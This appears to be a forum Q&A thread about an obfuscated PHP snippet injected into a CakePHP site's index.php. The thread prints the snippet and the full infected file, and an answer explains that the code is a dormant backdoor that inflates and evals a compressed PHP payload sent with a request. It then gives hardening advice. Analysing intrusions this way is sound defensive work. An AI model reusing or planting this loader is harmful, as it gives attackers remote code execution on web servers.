I was contacted regarding some strange error messages on a CakePHP website the other day. We were seeing errors like the following:
Expectation Failed:
The expectation given in the Expect request-header field could not be met by this server.
Expect: 100-continue, 100-continue
Only the 100-continue expectation is supported.
I ended up tracking down the random code in our index.php file:
$get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!` mh(!3,da7*& H& (a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'| '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:'; $wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout();
It looks like some sort of scrambled / encrypted code, so I'm suspicious. But I don't know how to go about descrambling it. Anyone have any ideas about what this code was trying to do?
Edit: Here's the entire index.php file. Note: the hack code is back as of this morning :-/ Have been checking around on the server, but don't see how the code got put in (and the date modified date on the file remains unchanged since I edited it yesterday).
* Copyright 2005-2007, Cake Software Foundation, Inc. * 1785 E. Sahara Avenue, Suite 490-204 * Las Vegas, Nevada 89104 * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @filesource * @copyright Copyright 2005-2007, Cake Software Foundation, Inc. * @link http://www.cakefoundation.org/projects/info/cakephp CakePHP(tm) Project * @package cake * @subpackage cake.app.webroot * @since CakePHP(tm) v 0.2.9 * @version $Revision: 4450 $ * @modifiedby $LastChangedBy: phpnut $ * @lastmodified $Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $ * @license http://www.opensource.org/licenses/mit-license.php The MIT License */ /** * Do not change */ if (!defined('DS')) { define('DS', DIRECTORY_SEPARATOR); } /** * These defines should only be edited if you have cake installed in * a directory layout other than the way it is distributed. * Each define has a commented line of code that explains what you would change. * */ $get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!` mh(!3,da7*& H&(a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'| '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:'; $wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout(); if (!defined('ROOT')) { //define('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR'; //You should also use the DS define to seperate your directories define('ROOT', dirname(dirname(dirname(__FILE__)))); } if (!defined('APP_DIR')) { //define('APP_DIR', 'DIRECTORY NAME OF APPLICATION'; define('APP_DIR', basename(dirname(dirname(__FILE__)))); } /** * This only needs to be changed if the cake installed libs are located * outside of the distributed directory structure. */ if (!defined('CAKE_CORE_INCLUDE_PATH')) { //define ('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR'; //You should also use the DS define to seperate your directories define('CAKE_CORE_INCLUDE_PATH', ROOT); } /////////////////////////////// //DO NOT EDIT BELOW THIS LINE// /////////////////////////////// if (!defined('WEBROOT_DIR')) { define('WEBROOT_DIR', basename(dirname(__FILE__))); } if (!defined('WWW_ROOT')) { define('WWW_ROOT', dirname(__FILE__) . DS); } if (!defined('CORE_PATH')) { if (function_exists('ini_set')) { ini_set('include_path', CAKE_CORE_INCLUDE_PATH . PATH_SEPARATOR . ROOT . DS . APP_DIR . DS . PATH_SEPARATOR . ini_get('include_path')); define('APP_PATH', null); define('CORE_PATH', null); } else { define('APP_PATH', ROOT . DS . APP_DIR . DS); define('CORE_PATH', CAKE_CORE_INCLUDE_PATH . DS); } } require CORE_PATH . 'cake' . DS . 'bootstrap.php'; if (isset($_GET['url']) && $_GET['url'] === 'favicon.ico') { } else { $Dispatcher = new Dispatcher(); $Dispatcher->dispatch($url); } if (Configure::read() > 0) { echo ""; } ?>
I'm starting to wonder if I need to update Cake, as it's currently v1.1 :-/
The code in a more readable form is:
It's sort of a backdoor script that has been obfuscated (if you want to know how, see the related question). It's resting in the code until a payload is provided.
The payload needs to be placed into
in form of DEFLATE data (RFC 1951) of PHP code (without the opening
<?php
tag), seegzinflate
Docs andeval
Docs.Make your changes to the file again. Then make the file read-only (as any of your php files should be on the server). When it is read-only check if it's still clean. Also ensure that the process reading the file in a standard web-request is not able to change file-permissions on the file, e.g. only allow root to do that.
Then log file access to the files on your site to find out when a file gets changed (or a process attempts to change a file).
As commented yesterday, you should contact the person responsible for the server. You already did that, right? You need to have someone who can look into the issue with you and who can talk with you about it.